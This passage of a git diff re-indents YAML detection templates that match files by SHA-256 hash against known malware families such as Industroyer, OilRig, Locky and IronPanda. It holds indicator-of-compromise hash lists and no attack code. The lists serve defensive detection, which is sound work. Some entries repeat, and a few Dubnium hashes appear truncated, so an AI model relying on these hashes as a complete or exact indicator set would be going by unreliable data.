"sha256(raw) == 'e0918072d427d12b43f436bf0797a361996ae436047d4ef8277f11caf2dd481b'" - - "sha256(raw) == '5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b'" - - "sha256(raw) == '5f07b074414513b73e202d7f77ec4bcf048f13dd735c9be3afcf25be818dc8e0'" - - "sha256(raw) == '839baf85de657b6d6503b6f94054efa8841f667987a9c805eab94a85a859e1ba'" - - "sha256(raw) == '16f0b05d5e8546ab1504b07b0eaa0e8de14bca7c1555fd114c4c1c51d5a4c06b'" - - "sha256(raw) == '1feaad03f6c0b57f5f5b02aef668e26001e5a7787bb51966d50c8fcf344fb4e8'" - - "sha256(raw) == '41ecd81bc7df4b47d713e812f2b7b38d3ac4b9dcdc13dd5ca61763a4bf300dcf'" - - "sha256(raw) == '5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b'" - - "sha256(raw) == '5f07b074414513b73e202d7f77ec4bcf048f13dd735c9be3afcf25be818dc8e0'" - - "sha256(raw) == 'a25715108d2859595959879ff50085bc85969e9473ecc3d26dda24c4a17822c9'" - - "sha256(raw) == 'bd780f4d56214c78045454d31d83ae18ed209cc138e75d138e72976a7ef9803f'" - - "sha256(raw) == 'e0918072d427d12b43f436bf0797a361996ae436047d4ef8277f11caf2dd481b'" - condition: or + - type: dsl + dsl: + - "sha256(raw) == '5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b'" + - "sha256(raw) == 'caefcdf2b4e5a928cdf9360b70960337f751ec4a5ab8c0b75851fc9a1ab507a8'" + - "sha256(raw) == 'e0362d319a8d0e13eda782a0d8da960dd96043e6cc3500faeae521d1747576e5'" + - "sha256(raw) == 'a77d1c452291a6f2f6ed89a4bac88dd03d38acde709b0061efd9f50e6d9f3827'" + - "sha256(raw) == '16f0b05d5e8546ab1504b07b0eaa0e8de14bca7c1555fd114c4c1c51d5a4c06b'" + - "sha256(raw) == '1feaad03f6c0b57f5f5b02aef668e26001e5a7787bb51966d50c8fcf344fb4e8'" + - "sha256(raw) == '41ecd81bc7df4b47d713e812f2b7b38d3ac4b9dcdc13dd5ca61763a4bf300dcf'" + - "sha256(raw) == '5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b'" + - "sha256(raw) == '5f07b074414513b73e202d7f77ec4bcf048f13dd735c9be3afcf25be818dc8e0'" + - "sha256(raw) == '839baf85de657b6d6503b6f94054efa8841f667987a9c805eab94a85a859e1ba'" + - "sha256(raw) == 'a25715108d2859595959879ff50085bc85969e9473ecc3d26dda24c4a17822c9'" + - "sha256(raw) == 'bd780f4d56214c78045454d31d83ae18ed209cc138e75d138e72976a7ef9803f'" + - "sha256(raw) == 'e0918072d427d12b43f436bf0797a361996ae436047d4ef8277f11caf2dd481b'" + - "sha256(raw) == '5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b'" + - "sha256(raw) == '5f07b074414513b73e202d7f77ec4bcf048f13dd735c9be3afcf25be818dc8e0'" + - "sha256(raw) == '839baf85de657b6d6503b6f94054efa8841f667987a9c805eab94a85a859e1ba'" + - "sha256(raw) == '16f0b05d5e8546ab1504b07b0eaa0e8de14bca7c1555fd114c4c1c51d5a4c06b'" + - "sha256(raw) == '1feaad03f6c0b57f5f5b02aef668e26001e5a7787bb51966d50c8fcf344fb4e8'" + - "sha256(raw) == '41ecd81bc7df4b47d713e812f2b7b38d3ac4b9dcdc13dd5ca61763a4bf300dcf'" + - "sha256(raw) == '5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b'" + - "sha256(raw) == '5f07b074414513b73e202d7f77ec4bcf048f13dd735c9be3afcf25be818dc8e0'" + - "sha256(raw) == 'a25715108d2859595959879ff50085bc85969e9473ecc3d26dda24c4a17822c9'" + - "sha256(raw) == 'bd780f4d56214c78045454d31d83ae18ed209cc138e75d138e72976a7ef9803f'" + - "sha256(raw) == 'e0918072d427d12b43f436bf0797a361996ae436047d4ef8277f11caf2dd481b'" + condition: or diff --git a/file/malware/hash/dubnium-sshopenssl-malware-hash.yaml b/file/malware/hash/dubnium-sshopenssl-malware-hash.yaml index 05606c7e0f..46a7dcfde6 100644 --- a/file/malware/hash/dubnium-sshopenssl-malware-hash.yaml +++ b/file/malware/hash/dubnium-sshopenssl-malware-hash.yaml @@ -10,16 +10,16 @@ info: tags: malware,Dubnium,apt file: - extensions: - - all + - extensions: + - all matchers: - type: dsl - dsl: - - "sha256(raw) == '6f0b05d5e8546ab1504b07b0eaa0e8de14bca7c1555fd114c4c1c51d5a4c06b'" - - "sha256(raw) == 'feaad03f6c0b57f5f5b02aef668e26001e5a7787bb51966d50c8fcf344fb4e8'" - - "sha256(raw) == '41ecd81bc7df4b47d713e812f2b7b38d3ac4b9dcdc13dd5ca61763a4bf300dcf'" - - "sha256(raw) == 'bd780f4d56214c78045454d31d83ae18ed209cc138e75d138e72976a7ef9803f'" - - "sha256(raw) == 'a25715108d2859595959879ff50085bc85969e9473ecc3d26dda24c4a17822c9'" - - "sha256(raw) == 'e0918072d427d12b43f436bf0797a361996ae436047d4ef8277f11caf2dd481b'" - condition: or + - type: dsl + dsl: + - "sha256(raw) == '6f0b05d5e8546ab1504b07b0eaa0e8de14bca7c1555fd114c4c1c51d5a4c06b'" + - "sha256(raw) == 'feaad03f6c0b57f5f5b02aef668e26001e5a7787bb51966d50c8fcf344fb4e8'" + - "sha256(raw) == '41ecd81bc7df4b47d713e812f2b7b38d3ac4b9dcdc13dd5ca61763a4bf300dcf'" + - "sha256(raw) == 'bd780f4d56214c78045454d31d83ae18ed209cc138e75d138e72976a7ef9803f'" + - "sha256(raw) == 'a25715108d2859595959879ff50085bc85969e9473ecc3d26dda24c4a17822c9'" + - "sha256(raw) == 'e0918072d427d12b43f436bf0797a361996ae436047d4ef8277f11caf2dd481b'" + condition: or diff --git a/file/malware/hash/emissary-malware-hash.yaml b/file/malware/hash/emissary-malware-hash.yaml index dd2cdda30a..49a012292b 100644 --- a/file/malware/hash/emissary-malware-hash.yaml +++ b/file/malware/hash/emissary-malware-hash.yaml @@ -10,23 +10,23 @@ info: tags: malware,emissary,apt file: - extensions: - - all + - extensions: + - all matchers: - type: dsl - dsl: - - "sha256(raw) == '9420017390c598ee535c24f7bcbd39f40eca699d6c94dc35bcf59ddf918c59ab'" - - "sha256(raw) == '70561f58c9e5868f44169854bcc906001947d98d15e9b4d2fbabd1262d938629'" - - "sha256(raw) == '0e64e68f6f88b25530699a1cd12f6f2790ea98e6e8fa3b4bc279f8e5c09d7290'" - - "sha256(raw) == '69caa2a4070559d4cafdf79020c4356c721088eb22398a8740dea8d21ae6e664'" - - "sha256(raw) == '675869fac21a94c8f470765bc6dd15b17cc4492dd639b878f241a45b2c3890fc'" - - "sha256(raw) == 'e817610b62ccd00bdfc9129f947ac7d078d97525e9628a3aa61027396dba419b'" - - "sha256(raw) == 'a8b0d084949c4f289beb4950f801bf99588d1b05f68587b245a31e8e82f7a1b8'" - - "sha256(raw) == 'acf7dc5a10b00f0aac102ecd9d87cd94f08a37b2726cb1e16948875751d04cc9'" - - "sha256(raw) == 'e21b47dfa9e250f49a3ab327b7444902e545bed3c4dcfa5e2e990af20593af6d'" - - "sha256(raw) == 'e369417a7623d73346f6dff729e68f7e057f7f6dae7bb03d56a7510cb3bfe538'" - - "sha256(raw) == '29d8dc863427c8e37b75eb738069c2172e79607acc7b65de6f8086ba36abf051'" - - "sha256(raw) == '98fb1d2975babc18624e3922406545458642e01360746870deee397df93f50e0'" - - "sha256(raw) == 'fbcb401cf06326ab4bb53fb9f01f1ca647f16f926811ea66984f1a1b8cf2f7bb'" - condition: or + - type: dsl + dsl: + - "sha256(raw) == '9420017390c598ee535c24f7bcbd39f40eca699d6c94dc35bcf59ddf918c59ab'" + - "sha256(raw) == '70561f58c9e5868f44169854bcc906001947d98d15e9b4d2fbabd1262d938629'" + - "sha256(raw) == '0e64e68f6f88b25530699a1cd12f6f2790ea98e6e8fa3b4bc279f8e5c09d7290'" + - "sha256(raw) == '69caa2a4070559d4cafdf79020c4356c721088eb22398a8740dea8d21ae6e664'" + - "sha256(raw) == '675869fac21a94c8f470765bc6dd15b17cc4492dd639b878f241a45b2c3890fc'" + - "sha256(raw) == 'e817610b62ccd00bdfc9129f947ac7d078d97525e9628a3aa61027396dba419b'" + - "sha256(raw) == 'a8b0d084949c4f289beb4950f801bf99588d1b05f68587b245a31e8e82f7a1b8'" + - "sha256(raw) == 'acf7dc5a10b00f0aac102ecd9d87cd94f08a37b2726cb1e16948875751d04cc9'" + - "sha256(raw) == 'e21b47dfa9e250f49a3ab327b7444902e545bed3c4dcfa5e2e990af20593af6d'" + - "sha256(raw) == 'e369417a7623d73346f6dff729e68f7e057f7f6dae7bb03d56a7510cb3bfe538'" + - "sha256(raw) == '29d8dc863427c8e37b75eb738069c2172e79607acc7b65de6f8086ba36abf051'" + - "sha256(raw) == '98fb1d2975babc18624e3922406545458642e01360746870deee397df93f50e0'" + - "sha256(raw) == 'fbcb401cf06326ab4bb53fb9f01f1ca647f16f926811ea66984f1a1b8cf2f7bb'" + condition: or diff --git a/file/malware/hash/fakem-malware-hash.yaml b/file/malware/hash/fakem-malware-hash.yaml index 7c544868af..85f755b7af 100644 --- a/file/malware/hash/fakem-malware-hash.yaml +++ b/file/malware/hash/fakem-malware-hash.yaml @@ -11,20 +11,21 @@ info: tags: malware,apt,fakem file: - extensions: - - all + - extensions: + - all + matchers: - type: dsl - dsl: - - "sha256(raw) == '631fc66e57acd52284aba2608e6f31ba19e2807367e33d8704f572f6af6bd9c3'" - - "sha256(raw) == '3d9bd26f5bd5401efa17690357f40054a3d7b438ce8c91367dbf469f0d9bd520'" - - "sha256(raw) == '53af257a42a8f182e97dcbb8d22227c27d654bea756d7f34a80cc7982b70aa60'" - - "sha256(raw) == '4a4dfffae6fc8be77ac9b2c67da547f0d57ffae59e0687a356f5105fdddc88a3'" - - "sha256(raw) == '7bfbf49aa71b8235a16792ef721b7e4195df11cb75371f651595b37690d108c8'" - - "sha256(raw) == '12dedcdda853da9846014186e6b4a5d6a82ba0cf61d7fa4cbe444a010f682b5d'" - - "sha256(raw) == '9adda3d95535c6cf83a1ba08fe83f718f5c722e06d0caff8eab4a564185971c5'" - - "sha256(raw) == '3209ab95ca7ee7d8c0140f95bdb61a37d69810a7a23d90d63ecc69cc8c51db90'" - - "sha256(raw) == '41948c73b776b673f954f497e09cc469d55f27e7b6e19acb41b77f7e64c50a33'" - - "sha256(raw) == '53cecc0d0f6924eacd23c49d0d95a6381834360fbbe2356778feb8dd396d723e'" - - "sha256(raw) == '523ad50b498bfb5ab688d9b1958c8058f905b634befc65e96f9f947e40893e5b'" - condition: or + - type: dsl + dsl: + - "sha256(raw) == '631fc66e57acd52284aba2608e6f31ba19e2807367e33d8704f572f6af6bd9c3'" + - "sha256(raw) == '3d9bd26f5bd5401efa17690357f40054a3d7b438ce8c91367dbf469f0d9bd520'" + - "sha256(raw) == '53af257a42a8f182e97dcbb8d22227c27d654bea756d7f34a80cc7982b70aa60'" + - "sha256(raw) == '4a4dfffae6fc8be77ac9b2c67da547f0d57ffae59e0687a356f5105fdddc88a3'" + - "sha256(raw) == '7bfbf49aa71b8235a16792ef721b7e4195df11cb75371f651595b37690d108c8'" + - "sha256(raw) == '12dedcdda853da9846014186e6b4a5d6a82ba0cf61d7fa4cbe444a010f682b5d'" + - "sha256(raw) == '9adda3d95535c6cf83a1ba08fe83f718f5c722e06d0caff8eab4a564185971c5'" + - "sha256(raw) == '3209ab95ca7ee7d8c0140f95bdb61a37d69810a7a23d90d63ecc69cc8c51db90'" + - "sha256(raw) == '41948c73b776b673f954f497e09cc469d55f27e7b6e19acb41b77f7e64c50a33'" + - "sha256(raw) == '53cecc0d0f6924eacd23c49d0d95a6381834360fbbe2356778feb8dd396d723e'" + - "sha256(raw) == '523ad50b498bfb5ab688d9b1958c8058f905b634befc65e96f9f947e40893e5b'" + condition: or diff --git a/file/malware/hash/furtim-malware-hash.yaml b/file/malware/hash/furtim-malware-hash.yaml index 0b4455f568..599006f431 100644 --- a/file/malware/hash/furtim-malware-hash.yaml +++ b/file/malware/hash/furtim-malware-hash.yaml @@ -11,12 +11,12 @@ info: tags: malware,apt,furtim file: - extensions: - - all + - extensions: + - all matchers: - type: dsl - dsl: - - "sha256(raw) == '766e49811c0bb7cce217e72e73a6aa866c15de0ba11d7dda3bd7e9ec33ed6963'" - - "sha256(raw) == '4f39d3e70ed1278d5fa83ed9f148ca92383ec662ac34635f7e56cc42eeaee948'" - condition: or + - type: dsl + dsl: + - "sha256(raw) == '766e49811c0bb7cce217e72e73a6aa866c15de0ba11d7dda3bd7e9ec33ed6963'" + - "sha256(raw) == '4f39d3e70ed1278d5fa83ed9f148ca92383ec662ac34635f7e56cc42eeaee948'" + condition: or diff --git a/file/malware/hash/greenbug-malware-hash.yaml b/file/malware/hash/greenbug-malware-hash.yaml index 10ba934f94..292f206408 100644 --- a/file/malware/hash/greenbug-malware-hash.yaml +++ b/file/malware/hash/greenbug-malware-hash.yaml @@ -11,22 +11,22 @@ info: tags: malware,Greenbug file: - extensions: - - all + - extensions: + - all matchers: - type: dsl - dsl: - - "sha256(raw) == 'dab460a0b73e79299fbff2fa301420c1d97a36da7426acc0e903c70495db2b76'" - - "sha256(raw) == '6b28a43eda5b6f828a65574e3f08a6d00e0acf84cbb94aac5cec5cd448a4649d'" - - "sha256(raw) == '21f5e60e9df6642dbbceca623ad59ad1778ea506b7932d75ea8db02230ce3685'" - - "sha256(raw) == '319a001d09ee9d754e8789116bbb21a3c624c999dae9cf83fde90a3fbe67ee6'" - - "sha256(raw) == '44bdf5266b45185b6824898664fd0c0f2039cdcb48b390f150e71345cd867c49'" - - "sha256(raw) == '7f16824e7ad9ee1ad2debca2a22413cde08f02ee9f0d08d64eb4cb318538be9c'" - - "sha256(raw) == '308a646f57c8be78e6a63ffea551a84b0ae877b23f28a660920c9ba82d57748f'" - - "sha256(raw) == '82beaef407f15f3c5b2013cb25901c9fab27b086cadd35149794a25dce8abcb9'" - - "sha256(raw) == '308a646f57c8be78e6a63ffea551a84b0ae877b23f28a660920c9ba82d57748f'" - - "sha256(raw) == '44bdf5266b45185b6824898664fd0c0f2039cdcb48b390f150e71345cd867c49'" - - "sha256(raw) == '7f16824e7ad9ee1ad2debca2a22413cde08f02ee9f0d08d64eb4cb318538be9c'" - - "sha256(raw) == '82beaef407f15f3c5b2013cb25901c9fab27b086cadd35149794a25dce8abcb9'" - condition: or \ No newline at end of file + - type: dsl + dsl: + - "sha256(raw) == 'dab460a0b73e79299fbff2fa301420c1d97a36da7426acc0e903c70495db2b76'" + - "sha256(raw) == '6b28a43eda5b6f828a65574e3f08a6d00e0acf84cbb94aac5cec5cd448a4649d'" + - "sha256(raw) == '21f5e60e9df6642dbbceca623ad59ad1778ea506b7932d75ea8db02230ce3685'" + - "sha256(raw) == '319a001d09ee9d754e8789116bbb21a3c624c999dae9cf83fde90a3fbe67ee6'" + - "sha256(raw) == '44bdf5266b45185b6824898664fd0c0f2039cdcb48b390f150e71345cd867c49'" + - "sha256(raw) == '7f16824e7ad9ee1ad2debca2a22413cde08f02ee9f0d08d64eb4cb318538be9c'" + - "sha256(raw) == '308a646f57c8be78e6a63ffea551a84b0ae877b23f28a660920c9ba82d57748f'" + - "sha256(raw) == '82beaef407f15f3c5b2013cb25901c9fab27b086cadd35149794a25dce8abcb9'" + - "sha256(raw) == '308a646f57c8be78e6a63ffea551a84b0ae877b23f28a660920c9ba82d57748f'" + - "sha256(raw) == '44bdf5266b45185b6824898664fd0c0f2039cdcb48b390f150e71345cd867c49'" + - "sha256(raw) == '7f16824e7ad9ee1ad2debca2a22413cde08f02ee9f0d08d64eb4cb318538be9c'" + - "sha256(raw) == '82beaef407f15f3c5b2013cb25901c9fab27b086cadd35149794a25dce8abcb9'" + condition: or \ No newline at end of file diff --git a/file/malware/hash/industroyer-malware-hash.yaml b/file/malware/hash/industroyer-malware-hash.yaml index 9a4ccf54db..c66c5d3756 100644 --- a/file/malware/hash/industroyer-malware-hash.yaml +++ b/file/malware/hash/industroyer-malware-hash.yaml @@ -10,19 +10,19 @@ info: tags: malware,industroyer,apt file: - extensions: - - all + - extensions: + - all matchers: - type: dsl - dsl: - - "sha256(raw) == 'ad23c7930dae02de1ea3c6836091b5fb3c62a89bf2bcfb83b4b39ede15904910'" - - "sha256(raw) == '018eb62e174efdcdb3af011d34b0bf2284ed1a803718fba6edffe5bc0b446b81'" - - "sha256(raw) == '3e3ab9674142dec46ce389e9e759b6484e847f5c1e1fc682fc638fc837c13571'" - - "sha256(raw) == '37d54e3d5e8b838f366b9c202f75fa264611a12444e62ae759c31a0d041aa6e4'" - - "sha256(raw) == 'ecaf150e087ddff0ec6463c92f7f6cca23cc4fd30fe34c10b3cb7c2a6d135c77'" - - "sha256(raw) == '6d707e647427f1ff4a7a9420188a8831f433ad8c5325dc8b8cc6fc5e7f1f6f47'" - - "sha256(raw) == '893e4cca7fe58191d2f6722b383b5e8009d3885b5913dcd2e3577e5a763cdb3f'" - - "sha256(raw) == '21c1fdd6cfd8ec3ffe3e922f944424b543643dbdab99fa731556f8805b0d5561'" - - "sha256(raw) == '7907dd95c1d36cf3dc842a1bd804f0db511a0f68f4b3d382c23a3c974a383cad'" - condition: or + - type: dsl + dsl: + - "sha256(raw) == 'ad23c7930dae02de1ea3c6836091b5fb3c62a89bf2bcfb83b4b39ede15904910'" + - "sha256(raw) == '018eb62e174efdcdb3af011d34b0bf2284ed1a803718fba6edffe5bc0b446b81'" + - "sha256(raw) == '3e3ab9674142dec46ce389e9e759b6484e847f5c1e1fc682fc638fc837c13571'" + - "sha256(raw) == '37d54e3d5e8b838f366b9c202f75fa264611a12444e62ae759c31a0d041aa6e4'" + - "sha256(raw) == 'ecaf150e087ddff0ec6463c92f7f6cca23cc4fd30fe34c10b3cb7c2a6d135c77'" + - "sha256(raw) == '6d707e647427f1ff4a7a9420188a8831f433ad8c5325dc8b8cc6fc5e7f1f6f47'" + - "sha256(raw) == '893e4cca7fe58191d2f6722b383b5e8009d3885b5913dcd2e3577e5a763cdb3f'" + - "sha256(raw) == '21c1fdd6cfd8ec3ffe3e922f944424b543643dbdab99fa731556f8805b0d5561'" + - "sha256(raw) == '7907dd95c1d36cf3dc842a1bd804f0db511a0f68f4b3d382c23a3c974a383cad'" + condition: or diff --git a/file/malware/hash/ironPanda-htran-malware-hash.yaml b/file/malware/hash/ironPanda-htran-malware-hash.yaml index 3a237e8ca3..be3cbf2f79 100644 --- a/file/malware/hash/ironPanda-htran-malware-hash.yaml +++ b/file/malware/hash/ironPanda-htran-malware-hash.yaml @@ -11,10 +11,10 @@ info: tags: malware,ironpanda file: - extensions: - - all + - extensions: + - all matchers: - type: dsl - dsl: - - "sha256(raw) == '7903f94730a8508e9b272b3b56899b49736740cea5037ea7dbb4e690bcaf00e7'" \ No newline at end of file + - type: dsl + dsl: + - "sha256(raw) == '7903f94730a8508e9b272b3b56899b49736740cea5037ea7dbb4e690bcaf00e7'" \ No newline at end of file diff --git a/file/malware/hash/ironpanda-dnstunclient-malware-hash.yaml b/file/malware/hash/ironpanda-dnstunclient-malware-hash.yaml index 696a548481..cf23adaea5 100644 --- a/file/malware/hash/ironpanda-dnstunclient-malware-hash.yaml +++ b/file/malware/hash/ironpanda-dnstunclient-malware-hash.yaml @@ -11,10 +11,10 @@ info: tags: malware,ironpanda file: - extensions: - - all + - extensions: + - all matchers: - type: dsl - dsl: - - "sha256(raw) == 'a08db49e198068709b7e52f16d00a10d72b4d26562c0d82b4544f8b0fb259431'" \ No newline at end of file + - type: dsl + dsl: + - "sha256(raw) == 'a08db49e198068709b7e52f16d00a10d72b4d26562c0d82b4544f8b0fb259431'" \ No newline at end of file diff --git a/file/malware/hash/ironpanda-malware-hash.yaml b/file/malware/hash/ironpanda-malware-hash.yaml index 241e17b3cd..2cd5242c76 100644 --- a/file/malware/hash/ironpanda-malware-hash.yaml +++ b/file/malware/hash/ironpanda-malware-hash.yaml @@ -9,14 +9,14 @@ info: tags: malware,IronPanda file: - extensions: - - all + - extensions: + - all matchers: - type: dsl - dsl: - - "sha256(raw) == 'a0cee5822ddf254c254a5a0b7372c9d2b46b088a254a1208cb32f5fe7eca848a'" - - "sha256(raw) == 'a89c21dd608c51c4bf0323d640f816e464578510389f9edcf04cd34090decc91'" - - "sha256(raw) == '5cd2af844e718570ae7ba9773a9075738c0b3b75c65909437c43201ce596a742'" - - "sha256(raw) == '0d6da946026154416f49df2283252d01ecfb0c41c27ef3bc79029483adc2240c'" - condition: or + - type: dsl + dsl: + - "sha256(raw) == 'a0cee5822ddf254c254a5a0b7372c9d2b46b088a254a1208cb32f5fe7eca848a'" + - "sha256(raw) == 'a89c21dd608c51c4bf0323d640f816e464578510389f9edcf04cd34090decc91'" + - "sha256(raw) == '5cd2af844e718570ae7ba9773a9075738c0b3b75c65909437c43201ce596a742'" + - "sha256(raw) == '0d6da946026154416f49df2283252d01ecfb0c41c27ef3bc79029483adc2240c'" + condition: or diff --git a/file/malware/hash/locky-ransomware-hash.yaml b/file/malware/hash/locky-ransomware-hash.yaml index 0e90f1e79e..bd15b7ff67 100644 --- a/file/malware/hash/locky-ransomware-hash.yaml +++ b/file/malware/hash/locky-ransomware-hash.yaml @@ -11,10 +11,10 @@ info: tags: ransomware,malware file: - extensions: - - all + - extensions: + - all matchers: - type: dsl - dsl: - - "sha256(raw) == '5e945c1d27c9ad77a2b63ae10af46aee7d29a6a43605a9bfbf35cebbcff184d8'" \ No newline at end of file + - type: dsl + dsl: + - "sha256(raw) == '5e945c1d27c9ad77a2b63ae10af46aee7d29a6a43605a9bfbf35cebbcff184d8'" \ No newline at end of file diff --git a/file/malware/hash/minidionis-readerview-malware-hash.yaml b/file/malware/hash/minidionis-readerview-malware-hash.yaml index 1a03e309bc..49d3c5925f 100644 --- a/file/malware/hash/minidionis-readerview-malware-hash.yaml +++ b/file/malware/hash/minidionis-readerview-malware-hash.yaml @@ -11,16 +11,16 @@ info: tags: malware,minidionis file: - extensions: - - all + - extensions: + - all matchers: - type: dsl - dsl: - - "sha256(raw) == 'ee5eb9d57c3611e91a27bb1fc2d0aaa6bbfa6c69ab16e65e7123c7c49d46f145'" - - "sha256(raw) == 'a713982d04d2048a575912a5fc37c93091619becd5b21e96f049890435940004'" - - "sha256(raw) == '88a40d5b679bccf9641009514b3d18b09e68b609ffaf414574a6eca6536e8b8f'" - - "sha256(raw) == '97d8725e39d263ed21856477ed09738755134b5c0d0b9ae86ebb1cdd4cdc18b7'" - - "sha256(raw) == 'ed7abf93963395ce9c9cba83a864acb4ed5b6e57fd9a6153f0248b8ccc4fdb46'" - - "sha256(raw) == '56ac764b81eb216ebed5a5ad38e703805ba3e1ca7d63501ba60a1fb52c7ebb6e'" - condition: or + - type: dsl + dsl: + - "sha256(raw) == 'ee5eb9d57c3611e91a27bb1fc2d0aaa6bbfa6c69ab16e65e7123c7c49d46f145'" + - "sha256(raw) == 'a713982d04d2048a575912a5fc37c93091619becd5b21e96f049890435940004'" + - "sha256(raw) == '88a40d5b679bccf9641009514b3d18b09e68b609ffaf414574a6eca6536e8b8f'" + - "sha256(raw) == '97d8725e39d263ed21856477ed09738755134b5c0d0b9ae86ebb1cdd4cdc18b7'" + - "sha256(raw) == 'ed7abf93963395ce9c9cba83a864acb4ed5b6e57fd9a6153f0248b8ccc4fdb46'" + - "sha256(raw) == '56ac764b81eb216ebed5a5ad38e703805ba3e1ca7d63501ba60a1fb52c7ebb6e'" + condition: or diff --git a/file/malware/hash/minidionis-vbs-malware-hash.yaml b/file/malware/hash/minidionis-vbs-malware-hash.yaml index 833c4a0c82..1c4a0c6d05 100644 --- a/file/malware/hash/minidionis-vbs-malware-hash.yaml +++ b/file/malware/hash/minidionis-vbs-malware-hash.yaml @@ -10,10 +10,10 @@ info: tags: malware,minidionis file: - extensions: - - all + - extensions: + - all matchers: - type: dsl - dsl: - - "sha256(raw) == '97dd1ee3aca815eb655a5de9e9e8945e7ba57f458019be6e1b9acb5731fa6646'" + - type: dsl + dsl: + - "sha256(raw) == '97dd1ee3aca815eb655a5de9e9e8945e7ba57f458019be6e1b9acb5731fa6646'" diff --git a/file/malware/hash/naikon-apt-malware-hash.yaml b/file/malware/hash/naikon-apt-malware-hash.yaml index 7e7011d5b1..ddb8f9177a 100644 --- a/file/malware/hash/naikon-apt-malware-hash.yaml +++ b/file/malware/hash/naikon-apt-malware-hash.yaml @@ -8,12 +8,12 @@ info: tags: malware,naikon file: - extensions: - - all + - extensions: + - all matchers: - type: dsl - dsl: - - "sha256(raw) == 'd5716c80cba8554eb79eecfb4aa3d99faf0435a1833ec5ef51f528146c758eba'" - - "sha256(raw) == 'f5ab8e49c0778fa208baad660fe4fa40fc8a114f5f71614afbd6dcc09625cb96'" - condition: or + - type: dsl + dsl: + - "sha256(raw) == 'd5716c80cba8554eb79eecfb4aa3d99faf0435a1833ec5ef51f528146c758eba'" + - "sha256(raw) == 'f5ab8e49c0778fa208baad660fe4fa40fc8a114f5f71614afbd6dcc09625cb96'" + condition: or diff --git a/file/malware/hash/neuron2-malware-hash.yaml b/file/malware/hash/neuron2-malware-hash.yaml index d90848501f..bed555af53 100644 --- a/file/malware/hash/neuron2-malware-hash.yaml +++ b/file/malware/hash/neuron2-malware-hash.yaml @@ -9,12 +9,12 @@ info: tags: malware,turla,neuron2,apt file: - extensions: - - all + - extensions: + - all matchers: - type: dsl - dsl: - - "sha256(raw) == '51616b207fde2ff1360a1364ff58270e0d46cf87a4c0c21b374a834dd9676927'" - - "sha256(raw) == '83d8922e7a8212f1a2a9015973e668d7999b90e7000c31f57be83803747df015'" - condition: or + - type: dsl + dsl: + - "sha256(raw) == '51616b207fde2ff1360a1364ff58270e0d46cf87a4c0c21b374a834dd9676927'" + - "sha256(raw) == '83d8922e7a8212f1a2a9015973e668d7999b90e7000c31f57be83803747df015'" + condition: or diff --git a/file/malware/hash/oilrig-malware-hash.yaml b/file/malware/hash/oilrig-malware-hash.yaml index 62bf87eb9c..cbd6353198 100644 --- a/file/malware/hash/oilrig-malware-hash.yaml +++ b/file/malware/hash/oilrig-malware-hash.yaml @@ -11,35 +11,35 @@ info: tags: malware,oilrig,apt file: - extensions: - - all + - extensions: + - all matchers: - type: dsl - dsl: - - "sha256(raw) == 'd808f3109822c185f1d8e1bf7ef7781c219dc56f5906478651748f0ace489d34'" - - "sha256(raw) == '80161dad1603b9a7c4a92a07b5c8bce214cf7a3df897b561732f9df7920ecb3e'" - - "sha256(raw) == '662c53e69b66d62a4822e666031fd441bbdfa741e20d4511c6741ec3cb02475f'" - - "sha256(raw) == '903b6d948c16dc92b69fe1de76cf64ab8377893770bf47c29bf91f3fd987f996'" - - "sha256(raw) == 'c4fbc723981fc94884f0f493cb8711fdc9da698980081d9b7c139fcffbe723da'" - - "sha256(raw) == '57efb7596e6d9fd019b4dc4587ba33a40ab0ca09e14281d85716a253c5612ef4'" - - "sha256(raw) == '1b2fee00d28782076178a63e669d2306c37ba0c417708d4dc1f751765c3f94e1'" - - "sha256(raw) == '9f31a1908afb23a1029c079ee9ba8bdf0f4c815addbe8eac85b4163e02b5e777'" - - "sha256(raw) == '0cd9857a3f626f8e0c07495a4799c59d502c4f3970642a76882e3ed68b790f8e'" - - "sha256(raw) == '4b5112f0fb64825b879b01d686e8f4d43521252a3b4f4026c9d1d76d3f15b281'" - - "sha256(raw) == '4e5b85ea68bf8f2306b6b931810ae38c8dff3679d78da1af2c91032c36380353'" - - "sha256(raw) == 'c3c17383f43184a29f49f166a92453a34be18e51935ddbf09576a60441440e51'" - - "sha256(raw) == 'f3856c7af3c9f84101f41a82e36fc81dfc18a8e9b424a3658b6ba7e3c99f54f2'" - - "sha256(raw) == '0c64ab9b0c122b1903e8063e3c2c357cbbee99de07dc535e6c830a0472a71f39'" - - "sha256(raw) == 'd874f513a032ccb6a5e4f0cd55862b024ea0bee4de94ccf950b3dd894066065d'" - - "sha256(raw) == '8ee628d46b8af20c4ba70a2fe8e2d4edca1980583171b71fe72455c6a52d15a9'" - - "sha256(raw) == '55d0e12439b20dadb5868766a5200cbbe1a06053bf9e229cf6a852bfcf57d579'" - - "sha256(raw) == '528d432952ef879496542bc62a5a4b6eee788f60f220426bd7f933fa2c58dc6b'" - - "sha256(raw) == '93940b5e764f2f4a2d893bebef4bf1f7d63c4db856877020a5852a6647cb04a0'" - - "sha256(raw) == 'e2ec7fa60e654f5861e09bbe59d14d0973bd5727b83a2a03f1cecf1466dd87aa'" - - "sha256(raw) == '9c0a33a5dc62933f17506f20e0258f877947bdcd15b091a597eac05d299b7471'" - - "sha256(raw) == 'a787c0e42608f9a69f718f6dca5556607be45ec77d17b07eb9ea1e0f7bb2e064'" - - "sha256(raw) == '3772d473a2fe950959e1fd56c9a44ec48928f92522246f75f4b8cb134f4713ff'" - - "sha256(raw) == '3986d54b00647b507b2afd708b7a1ce4c37027fb77d67c6bc3c20c3ac1a88ca4'" - - "sha256(raw) == 'f5a64de9087b138608ccf036b067d91a47302259269fb05b3349964ca4060e7e'" - condition: or + - type: dsl + dsl: + - "sha256(raw) == 'd808f3109822c185f1d8e1bf7ef7781c219dc56f5906478651748f0ace489d34'" + - "sha256(raw) == '80161dad1603b9a7c4a92a07b5c8bce214cf7a3df897b561732f9df7920ecb3e'" + - "sha256(raw) == '662c53e69b66d62a4822e666031fd441bbdfa741e20d4511c6741ec3cb02475f'" + - "sha256(raw) == '903b6d948c16dc92b69fe1de76cf64ab8377893770bf47c29bf91f3fd987f996'" + - "sha256(raw) == 